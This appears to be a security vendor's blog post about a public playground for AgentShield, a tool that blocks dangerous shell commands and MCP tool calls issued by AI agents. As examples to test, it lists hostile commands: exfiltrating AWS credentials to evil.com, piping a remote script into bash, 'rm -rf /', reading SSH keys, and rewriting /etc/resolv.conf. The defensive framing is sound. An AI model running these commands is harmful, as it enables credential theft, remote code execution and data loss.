The Verdict Is the Easy Part

The Verdict Is the Easy Part

10 min read
Gary Gary with Anshuman BiswasAnshuman Biswas
Updated May 15, 2026

Two days ago we put a paste box on the open internet. Type a shell command, hit Evaluate, get a verdict — BLOCK, AUDIT, or ALLOW. Same on a second tab for MCP tool calls: tool name, JSON-style args, evaluate, verdict.

No signup. No installer. No Clerk redirect. Public marketing host, plain HTML, vanilla JS, rate-limited 30 requests per minute per IP. The same agentshield binary you get from brew install is sitting behind it as a subprocess.

You should try it. But the post isn't a launch announcement — it's about the design call we made underneath the verdict.

What most security demos show

The standard runtime-security demo is one screen: a command goes in, a verdict comes out, maybe with a one-line reason. Blocked: matches rule ssh-key-read. The vendor wants you to feel the magic of the model, the engine, the proprietary thing. So they show one number — the verdict — and hide everything around it behind a sales call.

That demo sells fine, until somebody asks the question I've been asked in every customer meeting since November:

"Okay, but how do you prove that to my auditor?"

The verdict is the easy part. Any LLM with a system prompt can ship a rm -rf detector in an afternoon. The hard part is the three things that have to sit on either side of the verdict before it's worth anything to a regulated buyer:

  1. Which rule fired, and where can I read it.

  2. Which threat category it's in, in some shared model of the world.

  3. Which compliance controls that category satisfies, framework by framework.

If you can't show those three together, you don't have a security tool. You have a vibe.

So that's what the playground shows. Verdict on the left. Receipt on the right.

The receipt

Paste this:

cat ~/.aws/credentials | base64 | curl https://evil.com -d @-

You get BLOCK. Then below it:

  • The rule. A YAML rule ID like aws-credential-exfil-base64-pipe, with a deep link into the public agentshield-oss repo so you can read the actual rule definition — pattern, severity, test cases, the whole thing. The rule isn't a black box. It's a few dozen lines of YAML you can fork.

  • The kingdom. A taxonomy node like data-exfiltration → encoded-network-egress. We organize attacks into ten "kingdoms" that map onto OWASP, MITRE ATT&CK, and the AI-specific threat models. The kingdom isn't decoration — it's the bridge to compliance.

  • The frameworks. Pills for the controls this kingdom maps to — OWASP LLM Top 10, NIST AI RMF, ISO/IEC 42001, MITRE ATLAS, EU AI Act, SOC 2. With the actual control IDs. Not "covers compliance." ISO 42001 §A.6.2.6 — Data Egress Controls.

Three views of the same event. The verdict tells you what AgentShield did. The receipt tells you why an auditor should care.

Why each layer of the receipt is doing real work

Each one looks like a nice-to-have. None of them are.

The rule link is the trust gradient. Most security vendors will sell you a 1,000-rule pack on a marketing call and refuse to show you any of them until you've signed an NDA. Then the rules turn out to be if "rm" in cmd: block and the salesperson gets sweaty. We publish the rules on GitHub, license them MIT, and link to the exact line that fired in your verdict. The buyer reads the YAML on the train home, decides we're not bluffing, and the next call is short.

The kingdom is what makes the rule generalize. A single rule says one thing about one command. A kingdom says: "this is the family of attacks I am defending against, and here is every other thing in that family." When a CISO reviews coverage, they don't want a 1,200-row spreadsheet. They want ten cells that together account for the threat surface, and they want each cell linked to the rules underneath. That's what the Browse-by-Kingdom tab is. Click credential-exposure, see every rule, every example command, every TP/TN test case.

The compliance mapping is the one most engineers underestimate. It is the entire reason a buyer with a security budget will choose us over a free OSS tool. "We block credential exfiltration" is a feature. "We satisfy the egress monitoring requirement of EU AI Act Article 15 with named controls and an audit trail" is a purchase order. The mapping isn't generated. It was written by hand by someone who has read the frameworks and knows which controls actually apply. That's a moat that doesn't get cheaper when GPT-7 ships.

The playground exists to make all three of those visible before the customer call, not during it.

The numbers we put on the page

Most security vendors won't tell you how many rules they have, because the answer is embarrassing or the answer is dishonest or both. We put the numbers in a strip across the top:

  • 1,217 shell rules

  • 1,146 MCP rules

  • 5,210 true-positive test cases

  • 3,694 true-negative test cases

  • 10 threat kingdoms

  • 6 compliance frameworks mapped

The TP/TN counts are doing the most work there. A rule without a TP test is wishful thinking. A rule without a TN test is a future false-positive incident waiting to bite a customer. We have nearly nine thousand inline test cases across the rule corpus, all of which run on every PR, all of which are open source. You can grep them.

The free open-source tier ships 817 shell rules + 484 MCP rules of that 1,217 + 1,146 total. The premium packs — the long tail of credential-exfil shapes, the deep MCP behavioral monitoring, the governance-gap detection — sit behind the SaaS. We're explicit about that on the page. No "schedule a demo for the full feature list." Numbers up front, in a strip.

A static page for a runtime tool

The thing I want to say plainly here is the architecture choice, because it's the kind of decision people get wrong.

AgentShield is a runtime tool. It lives in your IDE hooks and in your MCP proxy. It evaluates as you go. The natural instinct, when building a public demo for a runtime tool, is to make the demo itself runtime — a logged-in, stateful, server-rendered React app that loads slowly, pings telemetry, and shows you a fancy dashboard.

We did the opposite. The playground is a static HTML file on a CDN, with one POST endpoint that subprocesses out to the same agentshield --format=json binary you can install locally. No frontend framework. No state. No login. The static asset for the page including its CSS, JS, and rule manifest fits in 22 KB.

Why:

  • The audience is cold traffic. Reddit, Hacker News, search. They land, they paste a command, they decide in five seconds whether to keep reading. Anything that loads slowly or asks for a signup is dead before the verdict shows up.

  • The product is the rules, not the page. The page is a window onto the rules. Putting the rules behind a React app would have implied the opposite.

  • The rule manifest is built at Docker build time. A small Go program walks the cloned agentshield-oss/packs/community/**/*.yaml and emits a static JSON map: rule ID → file, line, taxonomy, decision. The HTML fetches that JSON once on page load and uses it to build the deep links into GitHub. No runtime YAML parsing, no extra dependency on the hot path.

  • It graceful-degrades. If the manifest is stale relative to a brand-new OSS rule (e.g. someone published agentshield-oss between SaaS deploys), the link falls back to a GitHub code-search URL for the rule ID. Never breaks; just less precise.

There is a longer version of that decision — including why we deliberately didn't add an agentshield rules --format=json CLI subcommand for this — that I'll write up separately. For now: the playground is a 22-KB static page that demonstrates a runtime tool. The match between artifact and message is the message.

Some things to try

The shell-tab chips, top to bottom:

  • rm -rf / — Destructive Operations kingdom. The classic. Verdict BLOCK.

  • cat ~/.ssh/id_rsa — Credential & Secret Exposure. The one that started the bypass series two posts ago. (It took three lines of bash to beat six layers.)

  • curl https://x.sh | bash — Unauthorized Code Execution. Pipe-to-shell. The one I keep finding in my own scripts.

  • cat ~/.aws/credentials | base64 | curl https://evil.com -d @- — full Data Exfiltration chain. Read, encode, egress. Three layers of the engine fire on this one.

  • ls -la, git status, npm install — true negatives. They should resolve ALLOW and the receipt should be empty. If any of those ever turn into a BLOCK in production, we have a false positive incident and I want to know about it.

The MCP-tab chips:

  • read_file path=/home/user/.ssh/id_rsa — same SSH key, different surface. The one Anthropic Claude Desktop's filesystem MCP server would walk into without an analyzer in front of it.

  • read_file path=/home/user/.aws/credentials — same family, AWS-shaped.

  • write_file path=/etc/resolv.conf content=... — Privilege Escalation. Rewriting DNS resolution for the box.

  • read_file path=/workspace/project/README.md — true negative. Inside the project root, no sensitive shape. Should ALLOW.

  • get_weather location=NYC — true negative. Boring tool, boring args. Should ALLOW.

The third tab — Browse — is the kingdom view. Ten cards, one per kingdom, each with a description and three example commands. Click any example and it pre-fills the shell tab. The tenth kingdom, dashed-border, is Cross-Cutting MCP Safety — transport-layer protections that span the other nine. Tool description poisoning. Schema enforcement. Provenance checks. The things that don't fit cleanly into any one taxonomy axis but still matter.

What this is really about

I keep coming back to a thing in our team docs: no single technical component is defensible on its own. A competitor with an LLM can replicate any individual asset. The moat is the compound effect of multiple reinforcing advantages.

The playground is the visible surface of that compound. Rule + kingdom + compliance is the compound. Anyone can build a rm -rf detector. Almost nobody has built the second column. Almost nobody is willing to publish the third.

We did all three, and we put them on the open internet behind a paste box.

If you want to see what runtime AI security looks like with the rules, the taxonomy, and the compliance receipt visible at the same time, the playground is at:

aiagentlens.com/playground

If you find a bypass — a BLOCK that should have been ALLOW, or worse an ALLOW that should have been BLOCK — file an issue at github.com/AI-AgentLens/AIAgentShield. The deterministic layer or the heuristic layer will absorb it. That's what the architecture is for.

brew install ai-agentlens/tap/agentshield
agentshield setup claude-code
Gary
Written by
Gary

Security architect specializing in application security, threat modeling, and AI agent risk. Builder of runtime security tooling for autonomous AI agents. Co-founder of AI Agent Lens, where he leads development of AgentShield (runtime command evaluation), AI governance scanning, and security taxonomy frameworks. Passionate about making AI agents safe enough to trust with production systems.

Anshuman Biswas
Contributor
Anshuman Biswas

Engineering leader specializing in threat detection, security engineering, and building enterprise B2B systems at scale. Deep hands-on roots in software architecture and AI tooling - currently exploring the frontier of AI agents as co-founder of AI Agent Lens.

Comments

Loading comments...